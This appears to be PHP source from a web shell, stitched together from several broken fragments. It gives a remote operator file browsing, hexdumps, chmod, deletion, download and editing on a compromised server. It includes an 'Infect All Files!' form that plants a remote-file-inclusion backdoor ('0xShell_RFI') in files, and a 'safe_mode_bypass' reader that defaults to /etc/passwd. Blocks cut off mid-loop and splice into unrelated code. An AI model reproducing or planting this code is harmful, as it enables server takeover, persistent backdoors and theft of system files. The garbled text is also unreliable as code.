echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>";
} else {
echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>";
}
echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |";
}
echo "<hr size=\"1\" noshade>";
if ($ft == "info") {
echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>";
if (!$win) {
echo "<tr><td><b>Owner/Group</b></td><td> ";
$ow = posix_getpwuid(fileowner($d . $f));
$gr = posix_getgrgid(filegroup($d . $f));
echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f));
}
echo "<tr><td><b>Perms</b></td><td><a href=\"" . $surl . "act=chmod&f=" . urlencode($f) . "&d=" . urlencode($d) . "\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>";
$fi = fopen($d . $f, "rb");
if ($fi) {
if ($fullhexdump) {
echo "<b>FULL HEXDUMP</b>";
$str = fread($fi, filesize($d . $f));
} else {
echo "<b>HEXDUMP PREVIEW</b>";
$str = fread($fi, $hexdump_lines * $hexdump_rows);
}
$n = 0;
$a0 = "00000000<br>";
$a1 = "";
$a2 = "";
for ($i = 0; $i < strlen($str); $i++) {
$a1 .= sprintf("%02X", ord($str[$i])) . " ";
if (!is_readable(FILECONFIG) or is_dir(FILECONFIG) || !is_readable(FILEACCOUNT) or is_dir(FILEACCOUNT)) {
foreach ($settingfile as $file) {
if (file_exists($file)) {
$buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($file) . ")!</b>";
} else {
$buffer_TEXT .= '<b>' . $file . ' does not exists.</b><br />';
}
}
unset($file);
} else {
$close_config_page = false;
$styledisplay = ' style="display:none;"';
$showpostn = false;
$iserr = false;
foreach ($settingfile as $file) {
$buffer_TEXT .= "<b>File: " . basename($file) . " (" . view_size(filesize($file)) . ") attrib: " . view_perms_color($file) . "</b><br />";
}
unset($file);
$buffer_TEXT .= "You're logged with IP: <b class='g'>" . $visitors->userip . "</b><br /><hr width='800%' />";
if (isset($_POST['submit']) && $_POST['setupsave'] == 1) {
#============= WRITE CONFIG ================
# Final filter to write config
# Filter level 2; check strict value; raise error if value not valid
if ($task == 'editor') {
$edt = $_POST['edit_text'];
$sfile = $_POST['file'];
if (!write_file($sfile, $edt, 1)) {
$buffer_TEXT .= "<b class='a'>Can't write to file!</b>";
} else {
$buffer_TEXT .= "<b style='color:#00FF33'>Saved!</b>";
// $r = $edt;
function scandire($dir)
{
if (empty($dir)) {
$dir = getcwd();
}
$dir = chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>' . $pageend . '');
$dir = getcwd() . "/";
$dir = str_replace("\\", "/", $dir);
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if (filetype($dir . $file) == "dir") {
$dire[] = $file;
}
if (filetype($dir . $file) == "file" || filetype($dir . $file) == "link" || filetype($dir . $file) == "socket") {
$files[] = $file;
}
// if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns ""
// if(filetype($dir.$file)=="link") $files[]=$file;
// echo "file = ".$file." (".filetype($file).")<br>"; #debug
// if (is_link($file)) { echo " -> ".readlink($file); }; #debug
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table border>";
echo '<tr><td><form method="post" action="' . $_SERVER['PHP_SELF'] . '"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="' . $dir . '" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>';
echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>";
for ($i = 0; $i < count($dire); $i++) {
$link = $dir . $dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>Dir</td><td>' . view_size(dirsize($link)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($link)) . '<br>' . date("d/m/Y H:i:s", filemtime($link)) . '<br>' . date("d/m/Y H:i:s", fileatime($link)) . '</font></td><td>' . owner($link) . '</td><td>' . substr(sprintf('%o', fileperms($link)), -4) . ' <br>(' . view_perms_color($link, "string") . ')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Touch">T</a></td></tr>';
}
for ($i = 0; $i < count($files); $i++) {
$linkfile = $dir . $files[$i];
echo '<tr><td><a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();">' . $files[$i] . '</a>';
echo '<br></td><td>File</td><td>' . view_size(filesize($linkfile)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($linkfile)) . '<br>' . date("d/m/Y H:i:s", filemtime($linkfile)) . '<br>' . date("d/m/Y H:i:s", fileatime($linkfile)) . '</font></td><td>' . owner($linkfile) . '</td><td>' . substr(sprintf('%o', fileperms($linkfile)), -4) . ' <br>(' . view_perms_color($linkfile, "string") . ')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>';
}
echo "</table>";
}
}
}
echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b><u>" . $t[0] . "</u></b></a>";
} else {
echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='" . urlencode($f) . "';document.todo.ft.value='" . $t[1] . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\"><b>" . $t[0] . "</b></a>";
}
echo " |";
}
echo "<hr size=\"1\" noshade>";
if ($ft == "info") {
echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>";
if (!$win) {
echo "<tr><td><b>Owner/Group</b></td><td> ";
$ow = posix_getpwuid(fileowner($d . $f));
$gr = posix_getgrgid(filegroup($d . $f));
echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f));
}
echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='" . urlencode($f) . "';document.todo.d.value='" . urlencode($d) . "';document.todo.submit();\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>";
$fi = fopen($d . $f, "rb");
if ($fi) {
if ($fullhexdump) {
echo "<b>FULL HEXDUMP</b>";
$str = fread($fi, filesize($d . $f));
} else {
echo "<b>HEXDUMP PREVIEW</b>";
$str = fread($fi, $hexdump_lines * $hexdump_rows);
}
$n = 0;
$a0 = "00000000<br>";
$a1 = "";
$a2 = "";
for ($i = 0; $i < strlen($str); $i++) {
$a1 .= sprintf("%02X", ord($str[$i])) . " ";
print "<form method='post' action='" . $patch . "?action=infect_all_file'>\n" . "<textarea name='cod3inf' cols=50 rows=4>\n" . "<?php include(\$GET['0xShell_RFI']); ?>\n" . "</textarea>\n" . "<br /><input type='submit' value='Infect All Files!' name='inf3ct'><br />\n";
}
break;
case 'safe_mode_bypass':
print "<form action='" . $patch . "?action=safe_mode_bypass' method='POST'>\n" . "File Name: <input type='text' name='filew' value='/etc/passwd'><br />\n" . "<input type='submit' value='Read File' name='red_file'>\n" . "</form>\n";
if (isset($_POST['red_file'])) {
if (empty($_POST['filew'])) {
die("[ERROR] Enter the name file.");
} else {
safe_mode_bypass($_POST['filew']);
}
}
break;
case 'chmod':
$perms = parse_perms(fileperms($_GET['file']));
print "<form action=\"" . $patch . "?action=chmod&file=" . htmlspecialchars($_GET['file']) . "\" method=\"POST\">\n\t\t\t\t<h3 align=\"center\">Chmod File: <i>" . htmlspecialchars($_GET['file']) . " - (" . view_perms_color($_GET['file']) . ")</i></h3><br />\n\t\t\t\t<table align=center width=300 border=0 cellspacing=0 cellpadding=5>\n\t\t\t\t<tr><td><b>Owner</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_o_r' value=1" . ($perms["o"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox name='chmod_o_w' value=1" . ($perms["o"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_o_x' value=1" . ($perms["o"]["x"] ? " checked" : "") . ">eXecute</td>\n\t\t\t\t<td><b>Group</b><br><br>\t\t\t\t\n\t\t\t\t <input type=checkbox NAME='chmod_g_r' value=1" . ($perms["g"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_w' value=1" . ($perms["g"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_g_x' value=1" . ($perms["g"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td>\t\t\t\t\n\t\t\t\t<td><b>World</b><br><br>\n\t\t\t\t <input type=checkbox NAME='chmod_w_r' value=1" . ($perms["w"]["r"] ? " checked" : "") . ">Read\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_w' value=1" . ($perms["w"]["w"] ? " checked" : "") . ">Write\n\t\t\t\t<br><input type=checkbox NAME='chmod_w_x' value=1" . ($perms["w"]["x"] ? " checked" : "") . ">eXecute\n\t\t\t\t</font></td></tr><tr><td>\n\t\t\t\t<input type='submit' name='chmod_edit' value='Save'>\n\t\t\t\t</td></tr>\n\t\t\t\t</table>\n\t\t\t\t</form>";
if (isset($_POST['chmod_edit'])) {
$perms_final = "0" . base_convert((@$_POST['chmod_o_r'] ? 1 : 0) . (@$_POST['chmod_o_w'] ? 1 : 0) . (@$_POST['chmod_o_x'] ? 1 : 0) . (@$_POST['chmod_g_r'] ? 1 : 0) . (@$_POST['chmod_g_w'] ? 1 : 0) . (@$_POST['chmod_g_x'] ? 1 : 0) . (@$_POST['chmod_w_r'] ? 1 : 0) . (@$_POST['chmod_w_w'] ? 1 : 0) . (@$_POST['chmod_w_x'] ? 1 : 0), 2, 8);
print chmod_shell($_GET['file'], $perms_final);
}
break;
}
if (isset($remove_file)) {
//Rimozione file
if (!is_writable($remove_file)) {
die("File Not Deleted");
}
if (unlink($remove_file)) {
print "<script>alert('File Deleted'); location.href='" . $patch . "';</script>";
} else {
print "<script>alert('File Not Deleted'); location.href='" . $patch . "';</script>";
}
}
// === MAIN
$buffer_TEXT = '';
if (!is_readable($fileconfig) or is_dir($fileconfig)) {
if (file_exists($fileconfig)) {
$buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($fileconfig) . ")!</b>";
} else {
$buffer_TEXT .= "<b>File does not exists.</b>";
}
} else {
$styledisplay = ' style="display:none"';
$showpostn = false;
$iserr = false;
$t_head = "<b>File: " . CONFIG_FILE . " (" . view_size(filesize($fileconfig));
$t_head .= ") attrib: " . view_perms_color($fileconfig) . "</b>";
$t_head .= "<br>You're logged with IP: <b class='g'>" . get_real_ip() . "</b><br><hr width=\"800\">";
$buffer_TEXT .= $t_head;
if (isset($_GET["mode"])) {
if ($_GET["mode"] == "editor") {
$buffer_TEXT .= "<p><b><span id='nv1' style='background-color:#840000;color:yellow;'> Editor </span></p>";
}
}
if (isset($_POST['submit'])) {
if ($task == 'editor') {
$edt = $_POST["edit_text"];
$fp = fopen($fileconfig, "w");
if (!$fp) {
$buffer_TEXT .= "<b class='a'>Can't write to file!</b>";
} else {
fwrite($fp, $edt);
